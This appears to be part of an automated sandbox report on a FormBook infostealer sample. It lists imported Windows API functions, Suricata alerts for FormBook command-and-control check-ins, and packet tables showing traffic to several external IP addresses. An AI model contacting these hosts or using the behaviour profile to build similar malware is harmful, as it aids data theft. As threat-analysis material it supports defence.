SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, DeleteMenu, PeekMessageW, MessageBoxW, DefWindowProcW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, CharLowerBuffW, GetWindowTextW
GDI32.dll	SetPixel, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, GetDeviceCaps, CloseFigure, LineTo, AngleArc, CreateCompatibleBitmap, CreateCompatibleDC, MoveToEx, Ellipse, PolyDraw, BeginPath, SelectObject, StretchBlt, GetDIBits, DeleteDC, GetPixel, CreateDCW, GetStockObject, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, EndPath
COMDLG32.dll	GetSaveFileNameW, GetOpenFileNameW
ADVAPI32.dll	GetAclInformation, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, InitiateSystemShutdownExW, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, SetSecurityDescriptorDacl, AddAce, GetAce
SHELL32.dll	DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll	CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket
OLEAUT32.dll	RegisterTypeLib, LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, UnRegisterTypeLib, SafeArrayCreateVector, SysAllocString, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, QueryPathOfRegTypeLib, VariantCopy, VariantClear, CreateDispTypeInfo, CreateStdDispatch, DispCallFunc, VariantChangeType, SafeArrayAllocDescriptorEx, VariantInit

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	Great Britain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-18T03:22:59.099074+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49737	154.92.61.37	80	TCP
2024-11-18T03:22:59.099074+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49737	154.92.61.37	80	TCP
2024-11-18T03:23:14.937949+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49829	3.33.130.190	80	TCP
2024-11-18T03:23:17.489974+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49844	3.33.130.190	80	TCP
2024-11-18T03:23:20.041312+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49856	3.33.130.190	80	TCP
2024-11-18T03:23:22.653490+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49871	3.33.130.190	80	TCP
2024-11-18T03:23:22.653490+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49871	3.33.130.190	80	TCP
2024-11-18T03:23:28.614828+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49905	203.161.49.193	80	TCP
2024-11-18T03:23:31.146088+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49919	203.161.49.193	80	TCP
2024-11-18T03:23:33.708603+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49935	203.161.49.193	80	TCP
2024-11-18T03:23:36.255587+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	49951	203.161.49.193	80	TCP
2024-11-18T03:23:36.255587+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	49951	203.161.49.193	80	TCP
2024-11-18T03:23:42.141040+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49982	3.33.130.190	80	TCP
2024-11-18T03:23:44.744497+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	49996	3.33.130.190	80	TCP
2024-11-18T03:23:47.659781+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50007	3.33.130.190	80	TCP
2024-11-18T03:23:50.272002+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50014	3.33.130.190	80	TCP
2024-11-18T03:23:50.272002+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50014	3.33.130.190	80	TCP
2024-11-18T03:23:55.964091+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50015	3.33.130.190	80	TCP
2024-11-18T03:23:58.560099+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50016	3.33.130.190	80	TCP
2024-11-18T03:24:01.063135+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50017	3.33.130.190	80	TCP
2024-11-18T03:24:03.582753+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50018	3.33.130.190	80	TCP
2024-11-18T03:24:03.582753+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50018	3.33.130.190	80	TCP
2024-11-18T03:24:09.346163+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50019	198.252.98.54	80	TCP
2024-11-18T03:24:11.896249+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50020	198.252.98.54	80	TCP
2024-11-18T03:24:14.860685+0100	2855464	ETPRO MALWARE FormBook CnC Checkin (POST) M3	1	192.168.2.4	50021	198.252.98.54	80	TCP
2024-11-18T03:24:17.430311+0100	2050745	ET MALWARE FormBook CnC Checkin (GET) M5	1	192.168.2.4	50022	198.252.98.54	80	TCP
2024-11-18T03:24:17.430311+0100	2855465	ETPRO MALWARE FormBook CnC Checkin (GET) M2	1	192.168.2.4	50022	198.252.98.54	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 03:22:58.092271090 CET	49737	80	192.168.2.4	154.92.61.37
Nov 18, 2024 03:22:58.097284079 CET	80	49737	154.92.61.37	192.168.2.4
Nov 18, 2024 03:22:58.097374916 CET	49737	80	192.168.2.4	154.92.61.37
Nov 18, 2024 03:22:58.117820024 CET	49737	80	192.168.2.4	154.92.61.37
Nov 18, 2024 03:22:58.122741938 CET	80	49737	154.92.61.37	192.168.2.4
Nov 18, 2024 03:22:59.049093962 CET	80	49737	154.92.61.37	192.168.2.4
Nov 18, 2024 03:22:59.099073887 CET	49737	80	192.168.2.4	154.92.61.37
Nov 18, 2024 03:22:59.229156971 CET	80	49737	154.92.61.37	192.168.2.4
Nov 18, 2024 03:22:59.230428934 CET	49737	80	192.168.2.4	154.92.61.37
Nov 18, 2024 03:22:59.231643915 CET	49737	80	192.168.2.4	154.92.61.37
Nov 18, 2024 03:22:59.236507893 CET	80	49737	154.92.61.37	192.168.2.4
Nov 18, 2024 03:23:14.311909914 CET	49829	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:14.316797972 CET	80	49829	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:14.316878080 CET	49829	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:14.326419115 CET	49829	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:14.331334114 CET	80	49829	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:14.937859058 CET	80	49829	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:14.937948942 CET	49829	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:15.833543062 CET	49829	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:15.838432074 CET	80	49829	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:16.852169991 CET	49844	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:16.857069969 CET	80	49844	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:16.857148886 CET	49844	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:16.868513107 CET	49844	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:16.873368979 CET	80	49844	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:17.486285925 CET	80	49844	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:17.489974022 CET	49844	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:18.380589962 CET	49844	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:18.385705948 CET	80	49844	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:19.398767948 CET	49856	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:19.403734922 CET	80	49856	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:19.403840065 CET	49856	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:19.458304882 CET	49856	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:19.463255882 CET	80	49856	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:19.463269949 CET	80	49856	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:19.463289022 CET	80	49856	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:19.463320971 CET	80	49856	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:19.463334084 CET	80	49856	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:19.463439941 CET	80	49856	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:19.463617086 CET	80	49856	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:19.463629961 CET	80	49856	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:19.463644028 CET	80	49856	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:20.041233063 CET	80	49856	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:20.041311979 CET	49856	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:20.974441051 CET	49856	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:20.979379892 CET	80	49856	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:22.011861086 CET	49871	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:22.016896963 CET	80	49871	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:22.016964912 CET	49871	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:22.023060083 CET	49871	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:22.031975031 CET	80	49871	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:22.652698994 CET	80	49871	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:22.653429031 CET	80	49871	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:22.653490067 CET	49871	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:22.655117989 CET	49871	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:22.659899950 CET	80	49871	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:27.837327957 CET	49905	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:27.842323065 CET	80	49905	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:27.842403889 CET	49905	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:27.854455948 CET	49905	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:27.859386921 CET	80	49905	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:28.570615053 CET	80	49905	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:28.614828110 CET	49905	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:28.625226974 CET	80	49905	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:28.625905991 CET	49905	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:29.364901066 CET	49905	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:30.384752989 CET	49919	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:30.389805079 CET	80	49919	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:30.390038013 CET	49919	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:30.398582935 CET	49919	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:30.403582096 CET	80	49919	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:31.104600906 CET	80	49919	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:31.146087885 CET	49919	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:31.159209967 CET	80	49919	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:31.162435055 CET	49919	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:31.911822081 CET	49919	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:32.930555105 CET	49935	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:32.935667038 CET	80	49935	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:32.935957909 CET	49935	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:32.945506096 CET	49935	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:32.950658083 CET	80	49935	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:32.950692892 CET	80	49935	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:32.950731039 CET	80	49935	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:32.950789928 CET	80	49935	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:32.950845003 CET	80	49935	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:32.950876951 CET	80	49935	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:32.950931072 CET	80	49935	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:32.950961113 CET	80	49935	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:32.950994015 CET	80	49935	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:33.669365883 CET	80	49935	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:33.708602905 CET	49935	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:33.725637913 CET	80	49935	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:33.725821972 CET	49935	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:34.458878040 CET	49935	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:35.477195024 CET	49951	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:35.482131004 CET	80	49951	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:35.482214928 CET	49951	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:35.489334106 CET	49951	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:35.494314909 CET	80	49951	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:36.203958035 CET	80	49951	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:36.255587101 CET	49951	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:36.258910894 CET	80	49951	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:36.259035110 CET	49951	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:36.259880066 CET	49951	80	192.168.2.4	203.161.49.193
Nov 18, 2024 03:23:36.264708996 CET	80	49951	203.161.49.193	192.168.2.4
Nov 18, 2024 03:23:41.494617939 CET	49982	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:41.501655102 CET	80	49982	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:41.501729965 CET	49982	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:41.513530016 CET	49982	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:41.520364046 CET	80	49982	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:42.140744925 CET	80	49982	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:42.141040087 CET	49982	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:43.026885033 CET	49982	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:43.031821966 CET	80	49982	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:44.039453030 CET	49996	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:44.044358015 CET	80	49996	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:44.044450045 CET	49996	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:44.058895111 CET	49996	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:44.063833952 CET	80	49996	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:44.744302034 CET	80	49996	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:44.744497061 CET	49996	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:45.568363905 CET	49996	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:45.573307037 CET	80	49996	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:46.586170912 CET	50007	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:47.030113935 CET	80	50007	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:47.030319929 CET	50007	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:47.040193081 CET	50007	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:47.045126915 CET	80	50007	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:47.045144081 CET	80	50007	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:47.045193911 CET	80	50007	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:47.045206070 CET	80	50007	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:47.049832106 CET	80	50007	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:47.049846888 CET	80	50007	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:47.049859047 CET	80	50007	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:47.049871922 CET	80	50007	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:47.049885988 CET	80	50007	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:47.659703970 CET	80	50007	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:47.659780979 CET	50007	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:48.552467108 CET	50007	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:48.557647943 CET	80	50007	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:49.572274923 CET	50014	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:49.577356100 CET	80	50014	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:49.577440023 CET	50014	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:49.584367990 CET	50014	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:49.589245081 CET	80	50014	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:50.233027935 CET	80	50014	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:50.268768072 CET	80	50014	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:50.272001982 CET	50014	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:50.272738934 CET	50014	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:50.277553082 CET	80	50014	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:55.315951109 CET	50015	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:55.320907116 CET	80	50015	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:55.327939987 CET	50015	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:55.335947990 CET	50015	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:55.340863943 CET	80	50015	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:55.963915110 CET	80	50015	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:55.964091063 CET	50015	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:56.835946083 CET	50015	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:56.840878963 CET	80	50015	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:57.853287935 CET	50016	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:57.858234882 CET	80	50016	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:57.858314037 CET	50016	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:57.876209974 CET	50016	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:57.881098986 CET	80	50016	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:58.559268951 CET	80	50016	3.33.130.190	192.168.2.4
Nov 18, 2024 03:23:58.560098886 CET	50016	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:59.383960962 CET	50016	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:23:59.388895035 CET	80	50016	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:00.399403095 CET	50017	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:24:00.404376030 CET	80	50017	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:00.404448986 CET	50017	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:24:00.415040016 CET	50017	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:24:00.420422077 CET	80	50017	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:00.420435905 CET	80	50017	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:00.420466900 CET	80	50017	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:00.420557022 CET	80	50017	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:00.420586109 CET	80	50017	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:00.420598984 CET	80	50017	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:00.420619965 CET	80	50017	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:00.420634985 CET	80	50017	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:00.420646906 CET	80	50017	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:01.062980890 CET	80	50017	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:01.063134909 CET	50017	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:24:01.927958012 CET	50017	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:24:01.933186054 CET	80	50017	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:02.947444916 CET	50018	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:24:02.952424049 CET	80	50018	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:02.952514887 CET	50018	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:24:02.961467028 CET	50018	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:24:02.966288090 CET	80	50018	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:03.582122087 CET	80	50018	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:03.582690954 CET	80	50018	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:03.582752943 CET	50018	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:24:03.584894896 CET	50018	80	192.168.2.4	3.33.130.190
Nov 18, 2024 03:24:03.589798927 CET	80	50018	3.33.130.190	192.168.2.4
Nov 18, 2024 03:24:08.648113966 CET	50019	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:08.653289080 CET	80	50019	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:08.653472900 CET	50019	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:08.666491032 CET	50019	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:08.671471119 CET	80	50019	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:09.313282013 CET	80	50019	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:09.346072912 CET	80	50019	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:09.346163034 CET	50019	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:10.177831888 CET	50019	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:11.196430922 CET	50020	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:11.201618910 CET	80	50020	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:11.201853991 CET	50020	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:11.212625980 CET	50020	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:11.217545033 CET	80	50020	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:11.851063013 CET	80	50020	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:11.896249056 CET	50020	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:11.897474051 CET	80	50020	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:11.897636890 CET	50020	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:13.177836895 CET	50020	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:14.196518898 CET	50021	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:14.201658964 CET	80	50021	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:14.201880932 CET	50021	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:14.210599899 CET	50021	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:14.215790987 CET	80	50021	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:14.215805054 CET	80	50021	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:14.215816975 CET	80	50021	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:14.215827942 CET	80	50021	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:14.215840101 CET	80	50021	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:14.215868950 CET	80	50021	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:14.215879917 CET	80	50021	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:14.215890884 CET	80	50021	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:14.215903044 CET	80	50021	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:14.860213041 CET	80	50021	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:14.860575914 CET	80	50021	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:14.860685110 CET	50021	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:15.724455118 CET	50021	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:16.743376017 CET	50022	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:16.748399019 CET	80	50022	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:16.748549938 CET	50022	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:16.755650997 CET	50022	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:16.760646105 CET	80	50022	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:17.397373915 CET	80	50022	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:17.430155039 CET	80	50022	198.252.98.54	192.168.2.4
Nov 18, 2024 03:24:17.430310965 CET	50022	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:17.431137085 CET	50022	80	192.168.2.4	198.252.98.54
Nov 18, 2024 03:24:17.435980082 CET	80	50022	198.252.98.54	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 18, 2024 03:22:56.861943960 CET	51179	53	192.168.2.4	1.1.1.1
Nov 18, 2024 03:22:57.849168062 CET	51179	53	192.168.2.4	1.1.1.1
Nov 18, 2024 03:22:58.083297014 CET	53	51179	1.1.1.1	192.168.2.4
Nov 18, 2024 03:22:58.083353996 CET	53	51179	1.1.1.1	192.168.2.4
Nov 18, 2024 03:23:14.286295891 CET	54486	53	192.168.2.4	1.1.1.1
Nov 18, 2024 03:23:14.309788942 CET	53	54486	1.1.1.1	192.168.2.4
Nov 18, 2024 03:23:27.673558950 CET	58300	53	192.168.2.4	1.1.1.1
Nov 18, 2024 03:23:27.834372997 CET	53	58300	1.1.1.1	192.168.2.4
Nov 18, 2024 03:23:41.276576042 CET	54176	53	192.168.2.4	1.1.1.1
Nov 18, 2024 03:23:41.491919994 CET	53	54176	1.1.1.1	192.168.2.4
